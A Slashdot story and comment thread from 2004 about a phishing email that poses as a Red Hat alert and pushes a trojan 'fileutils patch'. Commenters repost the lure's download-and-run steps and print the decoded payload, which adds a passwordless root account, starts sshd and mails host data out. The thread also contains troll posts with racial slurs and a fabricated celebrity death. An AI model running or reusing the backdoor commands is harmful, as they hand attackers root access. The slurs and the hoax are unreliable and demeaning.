Beta

Slashdot: News for Nerds

×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Beware 'Fedora-Redhat' Fake Security Alert

timothy posted more than 9 years ago | from the don't-get-took dept.

Security 628

rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.

cancel ×

628 comments

What's the problem? (-1, Troll)

Anonymous Coward | more than 9 years ago | (#10617031)

Linux initself is malicious code.

GNAA declares victory over Wikipedia (-1, Flamebait)

Anonymous Coward | more than 9 years ago | (#10617032)

GNAA declares victory over Wikipedia
Zeikfried - Associated Press, Nigeria

In a week which shall be recorded in Wikipedia infamy (and then vandalized and redirected to clitoris), the oft persecuted and never defeated internet missionaries of the Gay Nigger Association of America [www.gnaa.us] struck yet another powerful and telling blow against the powerful forces of bigotry and racism. Most notably, the growing zionist community on renowned internet pissing yard wikipedia.org [wikipedia.org] .

And the records have indeed tumbled, with an unheard of third successful survival from the digital shitheap that is "Votes For Deletion" [wikipedia.org] . Coming in spite a heinous act of self promotion and cyber terrorism by Pat Gunn/Improv [dachte.org] (formerly known as Aharon Meshenstein prior to his infiltration of the United States), who listed and inspired mob vandalism upon the GNAA's entry [wikipedia.org] .

Fresh from his promotion of Wikipedia's $50,000 fundraiser for arms and supplies to the Jewish state of Israel, Improv launched a series of unprovoked and slanderous attacks against the well loved organisations leadership, all the while using foul and unholy necromancies to enlist the dead themselves to vote the entries deletion. Names such as "Wolfman" and "Demonslave" only adding to the damning list of evidence linking Mr Gunn to the occult.

Though Improv's actions gained him a small majority, a shock last minute intervention from Pope John Paul II spared the pages untimely fate, although as yet unconfirmed reports have indicated that several hundred 8-year old negro children were driven to the Basilica to secure the pontiffs support. Others point towards the black curse cast upon the deletion campaign by the support of infamous Brawl Hall mouthpiece "Yoyo [brawl-hall.com] " as the main driving force behind the salvation of the aforementioned entry.

But the details are likely to cause few sleepless nights among the group, only one of whom was willing to speak to the press. Namely GNAA Wikipedia contributor Popeye, who interrupted his drawing of pornography to give a brief dismissal the controversy: "Even with Improv's shady dealings, the sheer size and girth of a swollen GNAA phallus enables it both an identity and a vote of it's own. Making such discussion moot".

About Wikipedia:

Wikipedia, a content-free encyclopedia in many languages, started life in January 2001 and has already risen to the status of the internets premiere "trollpedia".

Currently Wikipedia contains 363950 articles, 10032 of which are genuine, and 343 of them factually accurate. Leaving Wikipedia on an academic par with "Star Wars: Incredible Cross-sections: The Ultimate Guide to Star Wars Vehicles and Spacecraft" [amazon.com] and "My First Book of Animals from A to Z" [amazon.com] .


About GNAA:

GNAA (GAY NIGGER ASSOCIATION OF AMERICA) is the first organization which gathers GAY NIGGERS from all over America and abroad for one common goal - being GAY NIGGERS.

Are you GAY [klerck.org] ?
Are you a NIGGER [mugshots.org] ?
Are you a GAY NIGGER [gay-sex-access.com] ?

If you answered "Yes" to all of the above questions, then GNAA (GAY NIGGER ASSOCIATION OF AMERICA) might be exactly what you've been looking for!
Join GNAA (GAY NIGGER ASSOCIATION OF AMERICA) today, and enjoy all the benefits of being a full-time GNAA member.
GNAA (GAY NIGGER ASSOCIATION OF AMERICA) is the fastest-growing GAY NIGGER community with THOUSANDS of members all over United States of America and the World! You, too, can be a part of GNAA if you join today!

Why not? It's quick and easy - only 3 simple steps!
  • First, you have to obtain a copy of GAYNIGGERS FROM OUTER SPACE THE MOVIE [imdb.com] and watch it. You can download the movie [idge.net] (~130mb) using BitTorrent.
  • Second, you need to succeed in posting a GNAA First Post [wikipedia.org] on slashdot.org [slashdot.org] , a popular "news for trolls" website.
  • Third, you need to join the official GNAA irc channel #GNAA on irc.gnaa.us, and apply for membership.
Talk to one of the ops or any of the other members in the channel to sign up today! Upon submitting your application, you will be required to submit links to your successful First Post, and you will be tested on your knowledge of GAYNIGGERS FROM OUTER SPACE.

If you are having trouble locating #GNAA, the official GAY NIGGER ASSOCIATION OF AMERICA irc channel, you might be on a wrong irc network. The correct network is NiggerNET, and you can connect to irc.gnaa.us as our official server. Follow this link [irc] if you are using an irc client such as mIRC.

If you have mod points and would like to support GNAA, please moderate this post up.

.________________________________________________.
| ______________________________________._a,____ | Press contact:
| _______a_._______a_______aj#0s_____aWY!400.___ | Gary Niger
| __ad#7!!*P____a.d#0a____#!-_#0i___.#!__W#0#___ | gary_niger@gnaa.us [mailto]
| _j#'_.00#,___4#dP_"#,__j#,__0#Wi___*00P!_"#L,_ | GNAA Corporate Headquarters
| _"#ga#9!01___"#01__40,_"4Lj#!_4#g_________"01_ | 143 Rolloffle Avenue
| ________"#,___*@`__-N#____`___-!^_____________ | Tarzana, California 91356
| _________#1__________?________________________ |
| _________j1___________________________________ | All other inquiries:
| ____a,___jk_GAY_NIGGER_ASSOCIATION_OF_AMERICA_ | Enid Indian
| ____!4yaa#l___________________________________ | enid_indian@gnaa.us [mailto]
| ______-"!^____________________________________ | GNAA World Headquarters
` _______________________________________________' 160-0023 Japan Tokyo-to Shinjuku-ku Nishi-Shinjuku 3-20-2

Copyright (c) 2003-2004 Gay Nigger Association of America [www.gnaa.us]

Sad news, Britney Spears dead at 22 (-1, Offtopic)

Troll-a-holic (823973) | more than 9 years ago | (#10617137)

Sad news, Britney Spears dead at 22

I just heard some really sad news on Fox - Singer and Popstar Britney Jean Spears was found dead in her Louisana home this morning.

Apparently, the cause of death was excessive bleeding after a sizzling night of hot anal sex with her ex. boyfriend, Justin Timberlake.

"We were just having good sushi, and she asked me if I would please her", said Justin. Although he has since turned gay after his breakup with her, Justin was willing to please Britney as long as she would take it up her ass.

Following a night of sex for 10 hours, Britney sustained an injury in her lower vaginal area and subsequently bled to death. Her husband Kevin Federline, who is at the moment spending time at a federal prison for sexual advances towards Natalie "hot grits" Portman was not available for comment.

However, President George W Bush offered his comments on the incident. "Here is the reason why anal sex is bad and why gays are unAmerican, they kill Americans and American icons", he was quoted as saying.

There weren't any more details. I'm sure everyone in the Slashdot community will surely miss her - even if you didn't enjoy her work, there's no denying her contributions to popular culture. Truly an American icon.

*sob*

Hit me baby, one more time. I'll miss you, oh baby baby.

Indeed, Britney. Indeed. Rest in peace, child.

DA TROLL-A-HOLIC IS BACKKKKKKKKKKKKKKKK

MUHAHAHAHAHHAAAAAAAAAAAAAAAAAAAAA!!!!!!!!!

fp (-1, Offtopic)

Anonymous Coward | more than 9 years ago | (#10617035)

fp

damn ms employee (-1, Troll)

Anonymous Coward | more than 9 years ago | (#10617037)

nice try!

Hmmmmm (-1, Flamebait)

Anonymous Coward | more than 9 years ago | (#10617039)

GNAA declares victory over Wikipedia
GNAA declares victory over Wikipedia
Zeikfried - Associated Press, Nigeria

In a week which shall be recorded in Wikipedia infamy (and then vandalized and redirected to clitoris), the oft persecuted and never defeated internet missionaries of the Gay Nigger Association of America [www.gnaa.us] struck yet another powerful and telling blow against the powerful forces of bigotry and racism. Most notably, the growing zionist community on renowned internet pissing yard wikipedia.org [wikipedia.org] .

And the records have indeed tumbled, with an unheard of third successful survival from the digital shitheap that is "Votes For Deletion" [wikipedia.org] . Coming in spite a heinous act of self promotion and cyber terrorism by Pat Gunn/Improv [dachte.org] (formerly known as Aharon Meshenstein prior to his infiltration of the United States), who listed and inspired mob vandalism upon the GNAA's entry [wikipedia.org] .

Fresh from his promotion of Wikipedia's $50,000 fundraiser for arms and supplies to the Jewish state of Israel, Improv launched a series of unprovoked and slanderous attacks against the well loved organisations leadership, all the while using foul and unholy necromancies to enlist the dead themselves to vote the entries deletion. Names such as "Wolfman" and "Demonslave" only adding to the damning list of evidence linking Mr Gunn to the occult.

Though Improv's actions gained him a small majority, a shock last minute intervention from Pope John Paul II spared the pages untimely fate, although as yet unconfirmed reports have indicated that several hundred 8-year old negro children were driven to the Basilica to secure the pontiffs support. Others point towards the black curse cast upon the deletion campaign by the support of infamous Brawl Hall mouthpiece "Yoyo [brawl-hall.com] " as the main driving force behind the salvation of the aforementioned entry.

But the details are likely to cause few sleepless nights among the group, only one of whom was willing to speak to the press. Namely GNAA Wikipedia contributor Popeye, who interrupted his drawing of pornography to give a brief dismissal the controversy: "Even with Improv's shady dealings, the sheer size and girth of a swollen GNAA phallus enables it both an identity and a vote of it's own. Making such discussion moot".

About Wikipedia:

Wikipedia, a content-free encyclopedia in many languages, started life in January 2001 and has already risen to the status of the internets premiere "trollpedia".

Currently Wikipedia contains 363950 articles, 10032 of which are genuine, and 343 of them factually accurate. Leaving Wikipedia on an academic par with "Star Wars: Incredible Cross-sections: The Ultimate Guide to Star Wars Vehicles and Spacecraft" [amazon.com] and "My First Book of Animals from A to Z" [amazon.com] .


About GNAA:

GNAA (GAY NIGGER ASSOCIATION OF AMERICA) is the first organization which gathers GAY NIGGERS from all over America and abroad for one common goal - being GAY NIGGERS.

Are you GAY [klerck.org] ?
Are you a NIGGER [mugshots.org] ?
Are you a GAY NIGGER [gay-sex-access.com] ?

If you answered "Yes" to all of the above questions, then GNAA (GAY NIGGER ASSOCIATION OF AMERICA) might be exactly what you've been looking for!
Join GNAA (GAY NIGGER ASSOCIATION OF AMERICA) today, and enjoy all the benefits of being a full-time GNAA member.
GNAA (GAY NIGGER ASSOCIATION OF AMERICA) is the fastest-growing GAY NIGGER community with THOUSANDS of members all over United States of America and the World! You, too, can be a part of GNAA if you join today!

Why not? It's quick and easy - only 3 simple steps!
  • First, you have to obtain a copy of GAYNIGGERS FROM OUTER SPACE THE MOVIE [imdb.com] and watch it. You can download the movie [idge.net] (~130mb) using BitTorrent.
  • Second, you need to succeed in posting a GNAA First Post [wikipedia.org] on slashdot.org [slashdot.org] , a popular "news for trolls" website.
  • Third, you need to join the official GNAA irc channel #GNAA on irc.gnaa.us, and apply for membership.
Talk to one of the ops or any of the other members in the channel to sign up today! Upon submitting your application, you will be required to submit links to your successful First Post, and you will be tested on your knowledge of GAYNIGGERS FROM OUTER SPACE.

If you are having trouble locating #GNAA, the official GAY NIGGER ASSOCIATION OF AMERICA irc channel, you might be on a wrong irc network. The correct network is NiggerNET, and you can connect to irc.gnaa.us as our official server. Follow this link [irc] if you are using an irc client such as mIRC.

If you have mod points and would like to support GNAA, please moderate this post up.

.________________________________________________.
| ______________________________________._a,____ | Press contact:
| _______a_._______a_______aj#0s_____aWY!400.___ | Gary Niger
| __ad#7!!*P____a.d#0a____#!-_#0i___.#!__W#0#___ | gary_niger@gnaa.us [mailto]
| _j#'_.00#,___4#dP_"#,__j#,__0#Wi___*00P!_"#L,_ | GNAA Corporate Headquarters
| _"#ga#9!01___"#01__40,_"4Lj#!_4#g_________"01_ | 143 Rolloffle Avenue
| ________"#,___*@`__-N#____`___-!^_____________ | Tarzana, California 91356
| _________#1__________?________________________ |
| _________j1___________________________________ | All other inquiries:
| ____a,___jk_GAY_NIGGER_ASSOCIATION_OF_AMERICA_ | Enid Indian
| ____!4yaa#l___________________________________ | enid_indian@gnaa.us [mailto]
| ______-"!^____________________________________ | GNAA World Headquarters
` _______________________________________________' 160-0023 Japan Tokyo-to Shinjuku-ku Nishi-Shinjuku 3-20-2

Copyright (c) 2003-2004 Gay Nigger Association of America [www.gnaa.us]

text of site (5, Informative)

Anonymous Coward | more than 9 years ago | (#10617041)

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

* First download the patch from the Stanford RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz or directly here.
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
* ./inst

Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.

Re:text of site (-1, Flamebait)

Anonymous Coward | more than 9 years ago | (#10617086)

It is known that *BSD and Solaris platforms are NOT affected.

With OpenBSD's narrow and forever changing definition of what constitutes as an exploit, it would surpise me if a hacker root-kitted an OpenBSD server and reformated it's harddriver wouldn't count oh but that would be a crash or some other excuse made by that smelly Ratt.

Re:text of site (0)

Botty (715495) | more than 9 years ago | (#10617117)

rofl....remote exploit in ls? Sure.....cause ls binds to port 1337 on execution...oh ya and I setuid ls. The thing about microsoft products is that because they keep everything so hush hush they COULD have remote exploits in the tiniest of products and programs. You never can be sure of what they're doing, but since Linux allows and encourages a complete understanding of how things work, this scare tactic is just laughable. The BSD and Solairs platform notice just means the hacker couldn't make his code portable ;)

Re: text (5, Insightful)

Inf0phreak (627499) | more than 9 years ago | (#10617145)

Why post the text instead of having the /. crowd flood their server to see what they've put up there? Potentially that could bring the server offline and cost them a bundle for a great two-sided effect (OK, the latter is not that cool if it's just some rooted box, but at least it would prevent anyone being affected if it was /.'ed to hell).

Re:text of site (0)

Anonymous Coward | more than 9 years ago | (#10617154)

So, #1 it doesn't use RPM? lets see what else could we see wrong with this?

Re:text of site (5, Informative)

Seehund (86897) | more than 9 years ago | (#10617203)

Actually, the exploit indeed seems to use RPM. The archive includes a .bin file, which in reality is an RPM.
drwxr-xr-x root/wheel 0 2004-10-23 21:09:09 fileutils-1.0.6.patch/
-rw-r--r-- root/wheel 32 2004-10-23 02:59:42 fileutils-1.0.6.patch/Makefile
-rw-r--r-- root/wheel 14297 2004-10-23 18:02:12 fileutils-1.0.6.patch/inst.c
-rw-r--r-- root/wheel 990084 2004-10-23 21:06:48 fileutils-1.0.6.patch/fileutils-patch.bin
But I see what you mean.

Also, a simple thing such as that this time you're not recommended to simply start up2date or yum to get updates as usual really should set off some alarms in people's minds. And that fedora-redhat.com is not and has never been used by Fedora or Red Hat. And so on.

I doubt that many fell for this.

DON'T DO THIS (-1)

Anonymous Coward | more than 9 years ago | (#10617168)

Jesus Tittyfucking Christ, put up a warning, will you? That's the text from the fake warning. By copy pasting it here you've probably gotten a few morons to install this malware afterall. Nice going.

Christ, they didn't do a very good job... (5, Insightful)

Nailer (69468) | more than 9 years ago | (#10617207)

The domain name was a good start, but these kids will have a hard time fooling anyone since they've ignored most of the basics:

  • Most users who install security upgrades won't be running Red Hat 7.x.
  • Red Hat is two words. Both begin with capitals.
  • Red Hat use packages. Not hard guys.
  • Security updates are provided through up2date. If they were smart, they would have provided an up2date source to use.
  • The exclamation marks in 'Apply this patch!' seem a little un vendor-like

Re:text of site (0)

Anonymous Coward | more than 9 years ago | (#10617239)

66.218.79.155, 66.218.79.147, 66.218.79.148, ...
Connecting to www.fedora-redhat.com[66.218.79.155]:80... connected.

# as of this post it is still up...

We knew this day would come (4, Insightful)

Orgazmus (761208) | more than 9 years ago | (#10617044)

Adopting dumb users had to bring the ones exploiting the stpidity with them. Even tho running as a non-admin should help againts these things, there is no cure against security holes between the chair and the keyboard.

Re:We knew this day would come (0, Flamebait)

Solean (705818) | more than 9 years ago | (#10617049)

Linux users are proven to be smarter than the Windows breed of the human race. :)

Re:We knew this day would come (5, Funny)

Stevyn (691306) | more than 9 years ago | (#10617054)

I wouldn't worry, they're probably on the forums trying to find the command to install it.

About Time (4, Insightful)

Mr. Arbusto (300950) | more than 9 years ago | (#10617045)

It's fishing, it happens on every platform and requires the user to do something they think is in their best interest. Nothing new.

I'll try it... (5, Interesting)

enginuitor (779522) | more than 9 years ago | (#10617048)

I am downloading the file to a Knoppix box, and will then disconnect the ethernet cord, run the code, and report back.

Stay tuned.

Re:I'll try it... (2, Interesting)

busonerd (534486) | more than 9 years ago | (#10617089)

Same here. Lets use this thread for a discussion of wtf it does.

Re:I'll try it... (4, Informative)

busonerd (534486) | more than 9 years ago | (#10617109)

[apologies for replying to myself]

The makefile compiles an application called inst that seems to have been created with the shc script compiler.. its rather obfuscated.. attempting to reverse engineer now

Re:I'll try it... (3, Informative)

Cid Highwind (9258) | more than 9 years ago | (#10617213)

From a quick glance at the source, it looks like "inst" is an RC4 decryption program a hard-coded (but obfuscated) key. It will probably decrypt fileutils-patch.bin into the real exploit code.

Re:I'll try it... (5, Informative)

damiam (409504) | more than 9 years ago | (#10617096)

Make sure you use a chroot jail; Knoppix can still write to your hard drive.

Re:I'll try it... (1)

enginuitor (779522) | more than 9 years ago | (#10617108)

I'm removing all local disks from the system. Just CD. Stay tuned for updates...

Re: I'll try it... Execution results! (5, Informative)

enginuitor (779522) | more than 9 years ago | (#10617157)

Identifying the system. This may take up to 2 minutes. Please wait...
adduser: No more than two names.
passwd: Unknown user bash
Could not load host key: /etc/ssh/ssh_host_key
Could not load host key: /etc/ssh/ssh_host_rsa_key
Could not load host key: /etc/ssh/ssh_host_dsa_key
Disabling protocol version 1. Could not load host key.
Disabling protocol version 2. Could not load host key.
sshd: no hostkeys available -- exiting.
System looks OK. Proceeding to next step.

Patching "ls": ###########
Patching "mkdir": ##########

System updated and secured successfully. You may erase these files.

Re: I'll try it... Execution results! (1)

Peridriga (308995) | more than 9 years ago | (#10617169)

Well... Thats all well and good... How about actually posting the source and what it does instead of the output...

Re: I'll try it... Execution results! (0)

Anonymous Coward | more than 9 years ago | (#10617201)

here you go [fedora-redhat.com]

Contents of inst.c... (5, Informative)

enginuitor (779522) | more than 9 years ago | (#10617229)

I've tried to post the code here, but am repeatedly blocked by the Lameness Filter. I have posted the C file to my server. It's safe to view, as long as you don't go trying to compile and run it! :-p
View inst.c [gee-enginuity.com]

Re: I'll try it... Execution results! (5, Informative)

enginuitor (779522) | more than 9 years ago | (#10617190)

It would appear that the author of this code was a bit foolish. The code appears to try to add a user, then start an sshd backdoor, all during the time that it's supposedly "Identifying the system". But it fails and spits out a bunch of errors! I will post the code shortly.

Re:I'll try it... (4, Informative)

eakerin (633954) | more than 9 years ago | (#10617172)

Well I downloaded it, and uncompressed it.

There are 3 files:
fileutils-patch.bin
inst.c
Makefile

fileutils-patch.bin is an rpm with an incorrect extension, but it's valid. And an actual RPM from redhat (verified the GPG signature) Probably just put there to make it look bigger, and have something that came from redhat.

Well I was gonna put the package header information here, but slashcode didn't like it.

Signature verification using "rpm --checksig fileutils-patch.bin"
fileutils-patch.bin: (sha1) dsa sha1 md5 gpg OK

Re:I'll try it... (5, Informative)

superpeach (110218) | more than 9 years ago | (#10617204)

I just looked at inst.c and changed it a bit to print what it runs instead of running it. Looks like a shell script hidden in some C (using shc, http://www.datsi.fi.upm.es/~frosal/sources/shc.htm l )

The working bit of the script is:

echo "Inca un root frate belea: " >> /tmp/mama
adduser -g 0 -u 0 -o bash >> /tmp/mama
passwd -d bash >> /tmp/mama
ifconfig >> /tmp/mama
uname -a >> /tmp/mama
uptime >> /tmp/mama
sshd >> /tmp/mama
echo "user bash stii tu" >> /tmp/mama
cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
rm -rf /tmp/mama

So, adds a user called bash with root privs, starts sshd and emails your IP address to someone.

wont work (3, Insightful)

Anonymous Coward | more than 9 years ago | (#10617052)

Don't most Fedora people use yum to keep their systems up to date? I don't think many Fedora/Red Hat admins would fall for this.

Re:wont work (1)

bcs_metacon.ca (656767) | more than 9 years ago | (#10617224)

Here's hoping *none* would. Fedora Core gives you the option of using up2date or yum right out of the box, and some people use apt. All three do GPG signature checking by default.

I hope anyone stupid enough to fall for this obvious scam would also be too dumb to know how to compile and install the software anyway.

This was a pretty lame attempt. If someone *really* wanted to cause havock, they'd hack one of the central repositories and insert poison packages into a trusted source. Of course, that's orders of magnitude more difficult. I mean, that hasn't even happened to Windows Update yet! :-)

I wonder... (1, Troll)

bennomatic (691188) | more than 9 years ago | (#10617053)

...was this set up by SCO, Microsoft or one of the anti-virus folks who want to prove that Linux isn't without its weaknesses...?

Re:I wonder... (0)

Anonymous Coward | more than 9 years ago | (#10617097)

/me straps on his Foil Hat.

MAYYYYBE!

Re:I wonder... (0)

Anonymous Coward | more than 9 years ago | (#10617110)

You must TRYING to get the tin-foil hat award.

Re:I wonder... (4, Funny)

Forezt (769932) | more than 9 years ago | (#10617129)

or better yet, it Microsoft paid the Yankee group to do it for them, and then do an "independent study" on it.

Re:I wonder... (0)

Anonymous Coward | more than 9 years ago | (#10617191)

wouldn't be surprised if they were...

Here's what WHOIS says: (5, Informative)

SIGBUS (8236) | more than 9 years ago | (#10617056)

[Querying whois.internic.net]
[Redirected to whois.melbourneit.com]
[Querying whois.melbourneit.com]
[whois.melbourneit.com]

Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES

Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............

Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax............. +1.6198813010
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com

Re:Here's what WHOIS says: (2, Informative)

barzok (26681) | more than 9 years ago | (#10617119)

95301 is Atwater, CA. There are at least 2 Cedar Avenues in NY (Staten Island and The Bronx), and one in Atwater.

Re:Here's what WHOIS says: (3, Informative)

datastalker (775227) | more than 9 years ago | (#10617158)

That phone number by area code and exchange is for Milton, CA, so chances are the entire WHOIS record is false.

Re:Here's what WHOIS says: (2, Informative)

Shandon (53512) | more than 9 years ago | (#10617187)

Data looks contradictory, but also be wary of the joe-job. Raymond Jackson may be an unpopular name to have right about now...

Whois on domains are easily faked (2, Informative)

Theatetus (521747) | more than 9 years ago | (#10617212)

However, the IP block clearly belongs to Yahoo, whois 66.218.75.0 lists contact point netblockadmin@yahoo-inc.com [mailto]

Anybody feel like dropping them a line to tell them they're hosting trojaners?

Yahoo! (2, Informative)

pavo (70713) | more than 9 years ago | (#10617215)

Shut it down! Someone paid you to host this, pass that information along to the authorities.

Re:Here's what WHOIS says: (1)

Ann Coulter (614889) | more than 9 years ago | (#10617237)

Did anyone save an e-mail from this guy? If this whois is fake, maybe the e-mail can tell us more. Just a thought.

In case the site goes down.. (0)

Anonymous Coward | more than 9 years ago | (#10617057)

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

* First download the patch from the Stanford RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz or directly here.
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
* ./inst

Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.

-
http://www.freestuffguide.net/ [freestuffguide.net]

Real link? (5, Insightful)

chrispyman (710460) | more than 9 years ago | (#10617061)

Why not just use the real link and slashdot their site into oblivion!

Re:Real link? (1)

JamesTRexx (675890) | more than 9 years ago | (#10617103)

I see great slashdotters think alike. :-)

Re:Real link? (1)

2mcm (775747) | more than 9 years ago | (#10617133)

But sum absent minded sys admin might forget what the article was about and think it was a real update.

Anyway never trust any serq updates that dont say what they do !!

Security only works when you know what to check (3, Insightful)

LostCluster (625375) | more than 9 years ago | (#10617063)

Red Hat's reply to this issue is pretty straight-forward. They've already taken all of the steps to properly sign their real updates, and this should stand out as a fake because it lacks all of those digital signatures.

However, what good is that against Joe User who falls for the bait and things the e-mail is authentic because they believe everything they read on their screen? They don't know to check for the "security seals" and since they don't see any red flags indicating that this is bogus.

It's something in info security that disconnects when dealing with average users. They don't know what to look for, and therefore the absense of those marks is not alarming to them as it is for us... a little something that needs to be cleaned up before Linux is ready for desktop primetime.

Nice spelling (0)

Anonymous Coward | more than 9 years ago | (#10617123)

Thoughtful post though!

Whois (1, Funny)

rsrsharma (769904) | more than 9 years ago | (#10617067)

Whois of fedora-redhat.com:

Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES

Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............

Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax............. +1.6198813010
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com

Looks like somebody's gonna get arrested. ;)

call the owner of the domain now. (-1, Redundant)

Anonymous Coward | more than 9 years ago | (#10617069)

Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES

Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............

Finally... (1)

Seabass55 (472183) | more than 9 years ago | (#10617071)

Something that will weed out dumb linux users just like most all Windows viruses attack the dumb windows users.

Re:Finally... (1)

JamesTRexx (675890) | more than 9 years ago | (#10617128)

Maybe we should stop using virusscanners and do like nature, those that survive all the diseases will evolve into a better species (of users).

Re:Finally... (5, Funny)

Fapestniegd (34586) | more than 9 years ago | (#10617163)

Debian has been weeding out incompetent users with its "impossible to use" installer for years.

It keeps the "Mandrake Crew" off of the debian-users lists.

Stupid Tricks? (5, Interesting)

dj_cel (744926) | more than 9 years ago | (#10617073)

It seems to me that most people using any version of Linux will not fall victim to these sorts of things. I would expect something like this to work for the majority of windows users, but as the audience of Linux is mostly tech-savy, I can't see this becoming a problem. The problem is going to be when larger groups of desktop users make the jump to Linux. What can be done to prevent this from happening in the future? What failsafes can be built into Linux to prevent people with less than average pc skills from destroying their systems?

Re:Stupid Tricks? (1, Informative)

stratjakt (596332) | more than 9 years ago | (#10617152)

I wouldn't say the audience of linux is tech-savvy, they just think they are.

The stupidest people I've ever met are the ones who think they know everything. Your average 14 year old who installs gentoo and now considers himself a giant in the world of computing fits the bill. I've suggested rm -rf / (logged in as root, of course) as a solution to email routing problems, and they do it.

They'd easily fall for this. More easily, I'd say, then the average clueless user, since many of them are slightly technophobic. You just have to tickle their egos. Put some big techical sounding words and acronymns in the email, and they'll suck it down.

Surprisingly (4, Funny)

Mentorix (620009) | more than 9 years ago | (#10617079)

Running untrusted code can result in system compromise.

Everyone checks the gpg signatures right?

Re:Surprisingly (1)

squarefish (561836) | more than 9 years ago | (#10617135)

I wouldn't be so sure that everyone even has the slightest idea of how to begin in checking the gpg signature

Re:Surprisingly (1)

bcs_metacon.ca (656767) | more than 9 years ago | (#10617180)

You don't have to. If you use a package installer like up2date, yum, or apt, they will complain loudly if a package isn't appropriately signed. This all happens without the user knowning anything about it. And unlike Windows, there's no inviting "Trust this software? Yes/No" dialog -- turning off trust is a little more complicated than that, and requires administrator access.

For what it's worth... (1)

Theatetus (521747) | more than 9 years ago | (#10617234)

To be honest, Microsoft's "trust this software?" dialog is pretty good: hard to fake and lets you view the signing certificate if you want to. The "Always trust software from these people" option kind of bugs me but I guess it's not much different from setting a key's trust level in GPG.

Re:Surprisingly (1)

Rykky (533501) | more than 9 years ago | (#10617230)

Well.. RedHat distros have you import their GPG key into RPM the first time you run up2date. Then RPM takes care of the signature checking for us and cries bloody murder when a package isnt signed or is signed incorrectly.

Slashdot (0)

Anonymous Coward | more than 9 years ago | (#10617090)

I would not worry, this page will prob be hit by the slashdot effect and be taken down just byu that....

